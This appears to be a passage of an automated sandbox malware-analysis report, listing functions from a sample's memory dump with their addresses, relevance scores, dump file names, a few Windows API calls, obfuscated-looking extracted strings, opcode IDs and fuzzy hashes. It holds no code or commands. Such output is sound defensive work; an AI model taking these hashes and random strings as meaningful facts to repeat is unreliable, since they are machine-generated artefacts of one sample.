                                                                                                                            • Instruction Fuzzy Hash: 72F1A0352582018FC707EE3CC69179ABBE1FB96374F14C92AE8A6C7355D63AC8158B13
                                                                                                                            Function 6D7448A0 Relevance: 4.0, Strings: 3, Instructions: 251COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: fjvukrfkipsuhgfrcaiuctsmyuqn$lfwghlwqmupf$qtgutkrmmcqftvjr
                                                                                                                            • API String ID: 0-1848510846
                                                                                                                            • Opcode ID: 8458c409dcfeb56c8cbde95f8157bb27318584de3dbe7a0e0413d45af664add7
                                                                                                                            • Instruction ID: 17ea1cc926d6a48acdb2b1f64ed4aadeab3172569333c28ee59a377d2af5f48e
                                                                                                                            • Opcode Fuzzy Hash: 8458c409dcfeb56c8cbde95f8157bb27318584de3dbe7a0e0413d45af664add7
                                                                                                                            • Instruction Fuzzy Hash: 5D918FB1610B408FC721DF3CC585A96BBF5FB0A324B008A2DD9968BB54D771F809DB92
                                                                                                                            Function 6D759D70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: DTw)
                                                                                                                            • API String ID: 0-2085347655
                                                                                                                            • Opcode ID: c23e4592db5101e7a096db3c2f0a476a93dd4f8d3a644813fee92e7c343fb24b
                                                                                                                            • Instruction ID: af9b621e2ed66b6a1bdf9d9c3ba6246130748c92acdbfc72b996082dd385fbdc
                                                                                                                            • Opcode Fuzzy Hash: c23e4592db5101e7a096db3c2f0a476a93dd4f8d3a644813fee92e7c343fb24b
                                                                                                                            • Instruction Fuzzy Hash: A961CDB5E142098FCF04CFACC6917EEBBF1AB1A324F108529E815EB391D7359815CB66
                                                                                                                            Function 6D753440 Relevance: 3.0, Strings: 2, Instructions: 517COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r>$r>
                                                                                                                            • API String ID: 0-2704234488
                                                                                                                            • Opcode ID: 3d01ff0020877b1139280df497bf9dc6d89e6eb11faa39f15225a88b6da2ab61
                                                                                                                            • Instruction ID: 85f08029741adc566fc30b9a83dc093b1abee4332338c3cdb910812bc31309fb
                                                                                                                            • Opcode Fuzzy Hash: 3d01ff0020877b1139280df497bf9dc6d89e6eb11faa39f15225a88b6da2ab61
                                                                                                                            • Instruction Fuzzy Hash: 2202AF76A142058FCF05CEBCD6957DDBBF1FB46360F108129E815AB3A0CB3A99598B13
                                                                                                                            Function 6D75B810 Relevance: 3.0, Strings: 2, Instructions: 456COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "s+$"s+
                                                                                                                            • API String ID: 0-732485500
                                                                                                                            • Opcode ID: fc3f202601b3abebcd70fb6a412978c23f39bd37034ad223c93a8a9789a7b2de
                                                                                                                            • Instruction ID: 077ad2dc367a8dc3b58da8359206f2f739eccaa894e954e582320479a3189aa8
                                                                                                                            • Opcode Fuzzy Hash: fc3f202601b3abebcd70fb6a412978c23f39bd37034ad223c93a8a9789a7b2de
                                                                                                                            • Instruction Fuzzy Hash: 0DF11675A142058FCF05CEACC6D53EDBBF2AB4A360F149129E811DB394CB36A916CB53
                                                                                                                            Function 6D744220 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: V$vshoyrrcntgkzwpltrcgzoklcyfyoqobmuulgety
                                                                                                                            • API String ID: 0-1501856120
                                                                                                                            • Opcode ID: a339d277e3ee1b30454290aa713ebe691b1f8c1e8b9888bbc912ac2d99ca9a36
                                                                                                                            • Instruction ID: f9d913a63698766b692dc57da0cf120ba9b27652614b3fbe9361da6e8e31b4b8
                                                                                                                            • Opcode Fuzzy Hash: a339d277e3ee1b30454290aa713ebe691b1f8c1e8b9888bbc912ac2d99ca9a36
                                                                                                                            • Instruction Fuzzy Hash: 38E12A326583428FC706CE3CC69539ABBE1BB8A379F10CA2DE465D7690C675D509BB03
                                                                                                                            Function 6D753030 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Dn94$9tm
                                                                                                                            • API String ID: 0-3014133278
                                                                                                                            • Opcode ID: 10c26f6a1b23c1edbd3540092efc12805636df0813931da7359c46c3b90c2c13
                                                                                                                            • Instruction ID: 7cbef143dbd9df20688d5589fb0d4767a596464ba7884fb6717503ef3a68bf68
                                                                                                                            • Opcode Fuzzy Hash: 10c26f6a1b23c1edbd3540092efc12805636df0813931da7359c46c3b90c2c13
                                                                                                                            • Instruction Fuzzy Hash: 9151BCB5E146098FDF05CFBCC6956EEBBF1EB0A320F108119E515E7361CB3699198B22
                                                                                                                            Function 6D7690E5 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D7690E0,?,?,00000008,?,?,6D768CE3,00000000), ref: 6D769312
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionRaise
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3997070919-0
                                                                                                                            • Opcode ID: bb628f650ddc52f3b7235f0d1b26aec2e3a87745a2ec85c527ee727c1c01b862
                                                                                                                            • Instruction ID: 7e149cf25c94a3dca416f0dced2f14969738bfe6dbf51cf9ef08de848be9706c
                                                                                                                            • Opcode Fuzzy Hash: bb628f650ddc52f3b7235f0d1b26aec2e3a87745a2ec85c527ee727c1c01b862
                                                                                                                            • Instruction Fuzzy Hash: 5EB179312106498FDB05CF28C686BA47BE0FF15364F258669ECA9CF2E1D335E982CB51
                                                                                                                            Function 6D742800 Relevance: 1.7, Strings: 1, Instructions: 412COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: tbsrzqfsnnnjozhbsllbroupropwkpvgyuwzfjrerzcdcmoqgpjztdvzjcbjcstlulzgtkvxxafflcneqdtpwlep
                                                                                                                            • API String ID: 0-3400311293
                                                                                                                            • Opcode ID: ca073471689115b526ea8bc80eb09fb2b80683f07cd4d507cb95ad8abe2b4f2f
                                                                                                                            • Instruction ID: 84b37ff8d25846291be79c5d7121ef5d2177dd3dae4fa5809275d5fb6a9e1d2a
                                                                                                                            • Opcode Fuzzy Hash: ca073471689115b526ea8bc80eb09fb2b80683f07cd4d507cb95ad8abe2b4f2f
                                                                                                                            • Instruction Fuzzy Hash: B1E1CF31A582458FDB26DEBCC6946DCBBF1BB02324F11C229C456EB258DB369919DF03
                                                                                                                            Function 6D75CF98 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D75CFAE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325560087-0
                                                                                                                            • Opcode ID: 64d9c4379814da699e0c41edc71e456c9e5b4491c68402ab6e486ecee67f019a
                                                                                                                            • Instruction ID: eda81c61f1c0385e6353011b9af6657a3e9ffbdf8eeede0ac0c40f0e12840a2e
                                                                                                                            • Opcode Fuzzy Hash: 64d9c4379814da699e0c41edc71e456c9e5b4491c68402ab6e486ecee67f019a
                                                                                                                            • Instruction Fuzzy Hash: 42516AB1E002068FEB04CF95CA817AAFBF0FB89361F14813AD819EB240DB75D910CB52
                                                                                                                            Function 6D762CBD Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e59f16d4463fd05c968612fbda947b1c7eba4769e4c4685f6a86f351e39d4515
                                                                                                                            • Instruction ID: 3b55f00dfdaed19bac0fe646c2e902c350c17704e88e0b37530458c7e3ca2c20
                                                                                                                            • Opcode Fuzzy Hash: e59f16d4463fd05c968612fbda947b1c7eba4769e4c4685f6a86f351e39d4515
                                                                                                                            • Instruction Fuzzy Hash: 4841A575805259AFDB60DF69CD88AEAB7B9EF45314F1442EAE819D3200E7319E44CF21
                                                                                                                            Function 6D756EC0 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: A,2N
                                                                                                                            • API String ID: 0-1336895270
                                                                                                                            • Opcode ID: bf6b90e41aa38ff0f3af1861141caeddd658a7a6c9f6372b22f8360405ee3a0b
                                                                                                                            • Instruction ID: 8cf97c650fc07349f459d0124e2603d1d3614858eb9022cda7bb53720a962dee
                                                                                                                            • Opcode Fuzzy Hash: bf6b90e41aa38ff0f3af1861141caeddd658a7a6c9f6372b22f8360405ee3a0b
                                                                                                                            • Instruction Fuzzy Hash: AFB18375E506159FCB05CEACC6947DEB7F1BB0B330F109219E815EB390CB2699168B93
                                                                                                                            Function 6D7543C0 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 7rK8
                                                                                                                            • API String ID: 0-541232490
                                                                                                                            • Opcode ID: 78cac8a6d03173d9346e181ae0f4458ca3e2d56061532ad46670343da62bc72a
                                                                                                                            • Instruction ID: bf5c9e72ca2015af3e9a9aacc4bc26db302d0622ee1c31ac42d11ad3303befe4
                                                                                                                            • Opcode Fuzzy Hash: 78cac8a6d03173d9346e181ae0f4458ca3e2d56061532ad46670343da62bc72a
                                                                                                                            • Instruction Fuzzy Hash: 4FA10171E541068FCB08CFBCD6853EE7BF1AB4A338F009129D425E7344DA3999299B53
                                                                                                                            Function 6D75A530 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Unknown exception
                                                                                                                            • API String ID: 0-410509341
                                                                                                                            • Opcode ID: ff968e24461eb4fc83566d23c1771f10e6f9f86714e7bcac7409e5bd688db56b
                                                                                                                            • Instruction ID: 2da82f672958aa695c81bf36082fac7be6fa90451f12db38fbcd7e53f2b3acb5
                                                                                                                            • Opcode Fuzzy Hash: ff968e24461eb4fc83566d23c1771f10e6f9f86714e7bcac7409e5bd688db56b
                                                                                                                            • Instruction Fuzzy Hash: F781D571E50116CFCF06CEBCD695FED7BF2BB06370F14952AD411AB240CA29A5198B23
                                                                                                                            Function 6D7643E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 54951025-0
                                                                                                                            • Opcode ID: c8691b38ce64d845b463559cc261c1c648f67d04fed5f277152c5d917cad433c
                                                                                                                            • Instruction ID: 64e0199a874c79abe78a49baa08101bb5054b18fc36e01731e5750723884162a
                                                                                                                            • Opcode Fuzzy Hash: c8691b38ce64d845b463559cc261c1c648f67d04fed5f277152c5d917cad433c
                                                                                                                            • Instruction Fuzzy Hash: C3A011B02023208B8B288E30830A30EBAB8AB02A823008038A008C0020EB2888008A03
                                                                                                                            Function 6D751CC0 Relevance: .7, Instructions: 735COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 689c673fb71af28065079e9477ec8d4946d406665400ba1542c0d9afbeb33518
                                                                                                                            • Instruction ID: 451ce89c3b1caaa157df686f1c7030c3b48326e3e5f347d64656ff54f43c33ea
                                                                                                                            • Opcode Fuzzy Hash: 689c673fb71af28065079e9477ec8d4946d406665400ba1542c0d9afbeb33518
                                                                                                                            • Instruction Fuzzy Hash: 0F42F376E601069FCF09CE7CD6953DD77F2AB46321F10D529D921EB294CA2A881ACF07
                                                                                                                            Function 6D757790 Relevance: .7, Instructions: 703COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7ef5e44417bceee98bada4e011b4699a40b549172489c6cd3534d35896aab1db
                                                                                                                            • Instruction ID: 74035a722bafda7814d9e28caa109bab073a3ef871a781e6dba8b1e54190d472
                                                                                                                            • Opcode Fuzzy Hash: 7ef5e44417bceee98bada4e011b4699a40b549172489c6cd3534d35896aab1db
                                                                                                                            • Instruction Fuzzy Hash: 9242B175E642458FCB05CEBCC6917DDBBF1AB06320F20C22AE815EB364C6369916CB17
                                                                                                                            Function 6D7558B0 Relevance: .6, Instructions: 562COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 00b4fe18100d2d259a6f6d798321d42976aca2c52b5ce79287b33860c3e7f800
                                                                                                                            • Instruction ID: 4ae8aefcb1c20fb6cba0cfb60e8a5d91e00238607ad326d74bb3c8f1a730e20c
                                                                                                                            • Opcode Fuzzy Hash: 00b4fe18100d2d259a6f6d798321d42976aca2c52b5ce79287b33860c3e7f800
                                                                                                                            • Instruction Fuzzy Hash: 4222BD71A142198FCB04CFBCEA986EDBBF2BB46324F108529D419AB344DB359919CB43
                                                                                                                            Function 6D75BE30 Relevance: .4, Instructions: 353COMMON
                                                                                                                            Download Yara Rule
